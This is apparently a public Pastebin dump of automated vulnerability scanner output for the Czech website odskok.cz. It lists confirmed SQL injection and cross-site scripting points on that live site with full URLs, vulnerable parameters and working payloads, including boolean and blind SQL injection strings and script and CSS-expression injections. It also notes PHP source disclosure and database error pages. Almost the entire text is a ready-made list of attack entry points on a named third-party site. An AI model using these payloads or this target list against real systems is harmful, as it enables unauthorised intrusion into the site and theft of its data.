Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ||| Boolean Based SQL Injection
- Severity : Critical
- Confirmation : Confirmed
- Vulnerable URL : http://www.odskok.cz/o_index.php?ap=s1&idk=2&id_od=2 AND 'NS='ss
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: id_od
- Parameter Type: Querystring
- Attack Pattern: 2 AND 'NS='ss
- Severity : Critical
- Confirmation : Confirmed
- Vulnerable URL : http://www.odskok.cz/sluzby/robot_text.php?slovo=3&id=-1 OR 17-7=10
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: -1 OR 17-7=10
- ||| [High Possibility] SQL Injection
- Severity : Critical
- Confirmation : Confirmed
- Vulnerable URL : http://www.odskok.cz/o_index.php?ap=s1&idk=%27&id_od=2
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: idk
- Parameter Type: Querystring
- Attack Pattern: %27
- Severity : Critical
- Confirmation : Confirmed
- Vulnerable URL : http://www.odskok.cz/o_index.php?ap=s1&idk=2&id_od=%27
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: id_od
- Parameter Type: Querystring
- Attack Pattern: %27
- ||| XSS (Cross-site Scripting)
- Severity : Important
- Confirmation : Confirmed
- Vulnerable URL : http://www.odskok.cz/o_index.php?ap=s1&idk='><script>alert(9)</script>&id_od=2
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: idk
- Parameter Type: Querystring
- Attack Pattern: '><script>alert(9)</script>
- Severity : Important
- Confirmation : Confirmed
- Vulnerable URL : http://www.odskok.cz/o_index.php?ap=hled&hledej=8&najdi=Vyhledej&retezec='"--></style></script><script>alert(0x000222)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: retezec
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x000222)</script>
- Severity : Important
- Confirmation : Confirmed
- Vulnerable URL : http://www.odskok.cz/sluzby/robot_n.php3?id=" stYle="x:expre/**/ssion(alert(9)) &slovo=3
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: " stYle="x:expre/**/ssion(alert(9))
- Severity : Important
- Confirmation : Confirmed
- Vulnerable URL : http://www.odskok.cz/sluzby/robot_n.php3?id=110&slovo=" stYle=x:expre/**/ssion(alert(9)) ns="
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: slovo
- Parameter Type: Querystring
- Attack Pattern: " stYle=x:expre/**/ssion(alert(9)) ns="
- Severity : Important
- Confirmation : Confirmed
- Vulnerable URL : http://www.odskok.cz/sluzby/robot_n.php?id=" stYle=x:expre/**/ssion(alert(9)) ns=" &slovo=3
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: " stYle=x:expre/**/ssion(alert(9)) ns="
- Severity : Important
- Confirmation : Confirmed
- Vulnerable URL : http://www.odskok.cz/sluzby/robot_n.php3?slovo=" stYle=x:expre/**/ssion(alert(9)) ns="
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: slovo
- Parameter Type: Querystring
- Attack Pattern: " stYle=x:expre/**/ssion(alert(9)) ns="
- Severity : Important
- Confirmation : Confirmed
- Vulnerable URL : http://www.odskok.cz/odskok/o_f_pratele.php?url='"--></style></script><script>alert(0x0003BC)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: url
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x0003BC)</script>
- Severity : Important
- Confirmation : Confirmed
- Vulnerable URL : http://www.odskok.cz/odskok/o_f_znamka.php?id_od='"--></style></script><script>alert(0x0003CF)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: id_od
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x0003CF)</script>
- Severity : Important
- Confirmation : Confirmed
- Vulnerable URL : http://www.odskok.cz/odskok/o_f_pratele.php?url='"--></style></script><script>alert(0x000447)</script>&name=Mobile
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: url
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x000447)</script>
- Severity : Important
- Confirmation : Confirmed
- Vulnerable URL : http://www.odskok.cz/sluzby/br.php?brana=" stYle="x:expre/**/ssion(alert(9)) &co=1
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: brana
- Parameter Type: Querystring
- Attack Pattern: " stYle="x:expre/**/ssion(alert(9))
- Severity : Important
- Confirmation : Confirmed
- Vulnerable URL : http://www.odskok.cz/sluzby/robot_n.php?id=498&slovo=" stYle=x:expre/**/ssion(alert(9)) ns="
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: slovo
- Parameter Type: Querystring
- Attack Pattern: " stYle=x:expre/**/ssion(alert(9)) ns="
- Severity : Important
- Confirmation : Confirmed
- Vulnerable URL : http://www.odskok.cz/odskok/o_f_pratele.php?url='"--></style></script><script>alert(0x0004B0)</script>&a_bid=59
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: url
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x0004B0)</script>
- Severity : Important
- Confirmation : Confirmed
- Vulnerable URL : http://www.odskok.cz/sluzby/nove_o_hry.php?url=" stYle=x:expre/**/ssion(alert(9)) ns="
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: url
- Parameter Type: Querystring
- Attack Pattern: " stYle=x:expre/**/ssion(alert(9)) ns="
- Severity : Important
- Confirmation : Confirmed
- Vulnerable URL : http://www.odskok.cz/o_index.php
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: datum
- Parameter Type: Post
- Attack Pattern: --><script>alert(9)</script>
- Severity : Important
- Confirmation : Confirmed
- Vulnerable URL : http://www.odskok.cz/o_index.php
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: email
- Parameter Type: Post
- Attack Pattern: "><script>alert(9)</script>
- Severity : Important
- Confirmation : Confirmed
- Vulnerable URL : http://www.odskok.cz/sluzby/br.php?brana=1&co=" stYle=x:expre/**/ssion(alert(9)) ns="
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: co
- Parameter Type: Querystring
- Attack Pattern: " stYle=x:expre/**/ssion(alert(9)) ns="
- ||| [Possible] Cross-site Scripting
- Severity : Medium
- Confirmation : Confirmed
- Vulnerable URL : http://www.odskok.cz/sluzby/robot_text.php3?slovo='"--></style></script><script>alert(0x0004F6)</script>&id=3
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Notes: This page responses with HTTP redirect status therefore detected XSS vulnerability might not be exploitable in many conditions however it still indicates lack of correct filtering and should be addressed.
- Parameter Name: slovo
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>netsparker(0x0004F6)</script>
- Severity : Medium
- Confirmation : Confirmed
- Vulnerable URL : http://www.odskok.cz/sluzby/robot_text.php?slovo='"--></style></script><script>alert(0x00050F)</script>&id=3
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Notes: This page responses with HTTP redirect status therefore detected XSS vulnerability might not be exploitable in many conditions however it still indicates lack of correct filtering and should be addressed.
- Parameter Name: slovo
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>netsparker(0x00050F)</script>
- ||| [Possible] PHP Source Code Disclosure
- Severity : Medium
- Confirmation : Confirmed
- Vulnerable URL : http://www.odskok.cz/sluzby/robot_menu.html
- Vulnerability Classifications: PCI 6.5.6 CAPEC-118 CWE-200 209
- ||| Database Error Message
- Severity : Low
- Confirmation : Confirmed
- Vulnerable URL : http://www.odskok.cz/sluzby/robot_text.php3?slovo=&id=
- Vulnerability Classifications: PCI 6.5.6 OWASP A6 CAPEC-118 CWE-200 209
- ||| MySQL Database Identified
- Severity : Information
- Confirmation : Confirmed
- Vulnerable URL : http://www.odskok.cz/o_index.php?ap=s1&idk=2&id_od=-1 OR 1=1 AND 1=(SELECT IF((IFNULL(ASCII(SUBSTRING((SELECT CONCAT(CHAR(78),CHAR(69),CHAR(84),CHAR(83),CHAR(80),CHAR(65),CHAR(82),CHAR(75),CHAR(69),CHAR(82))),5,1)),0)=88),1,2))
- Parameter Name: id_od
- Parameter Type: Querystring
- Attack Pattern: -1 OR 1=1 AND 1=(SELECT IF((IFNULL(ASCII(SUBSTRING((SELECT CONCAT(CHAR(78),CHAR(69),CHAR(84),CHAR(83),CHAR(80),CHAR(65),CHAR(82),CHAR(75),CHAR(69),CHAR(82))),5,1)),0)=88),1,2))
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement